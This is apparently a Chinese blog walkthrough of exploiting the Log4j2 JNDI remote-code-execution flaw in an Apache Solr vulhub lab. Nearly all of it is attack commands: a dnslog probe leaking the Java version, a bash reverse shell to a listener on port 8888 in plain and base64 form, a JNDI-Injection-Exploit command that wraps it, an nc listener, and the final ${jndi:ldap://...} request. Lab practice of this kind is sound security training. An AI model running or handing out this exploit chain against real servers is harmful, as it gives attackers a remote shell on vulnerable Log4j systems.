当前位置: 首页 > news >正文

远程代码执行-Log4j2漏洞

1.在vulhub中打开环境

进入环境所在的文件  打开环境

docker-compose up -d

2.浏览器访问打开环境

3.使用dnslog查看是否存在漏洞

solr/admin/cores?action=${jndi:ldap://${sys:java.version}.9dbu98.dnslog.cn

发现可以返回java版本 说明存在漏洞

4.开始反弹shell

下载jdni放到攻击机

反弹shell

bash -i >& /dev/tcp/192.168.10.233/8888 0>&1

反弹shell经过base-64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzMy84ODg4IDA+JjE=

最终payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzMy84ODg4IDA+JjE=

}|{base64,-d}|{bash, -i}" -A "192.168.10.233"

5.服务器监听

nc -lvvp 8888

6.使用jdk1.8的payload直接访问

/solr/admin/cores?action=${jndi:ldap://192.168.10.233:1389/o2qeea} ${jndi:ldap://192.168.10.233:8888/uma7pn}


http://www.mrgr.cn/news/22079.html

相关文章:

  • 三相直流无刷电机(BLDC)控制算法实现:BLDC有感启动算法思路分析
  • 第二十四章 rust中的运算符重载
  • Kotlin reified改造JSON解析
  • Origin 2024中文版下载安装教程最新版百度网盘分享链接地址
  • vulhub Thinkphp5 2-rce远程代码执行漏洞
  • C++ STL 数据结构 vector基本用法
  • UnLua调用C++函数
  • 嵌入式秋招面试 学习 面试经验提醒和分享
  • 活期存款类型
  • 物联网之ESP32开发板简介、Arduino
  • 01 Docker概念和部署
  • 【重学 MySQL】十七、比较运算符的使用
  • Python画笔案例-038 绘制齿形图
  • Arch - 架构安全性_认证(Authentication)的标准和实现
  • FreeRTOS-基本介绍和移植STM32
  • 【论文编写】利用在线工具生成表格图片的Latex语句
  • k8s笔记
  • 小白也能看得懂!如何在浏览器插件的文件中合法引入第三方依赖远程代码?
  • 开放式耳机好用?平价开放式耳机推荐?四款开放式的蓝牙耳机推荐
  • vcpkg子包路径批量获取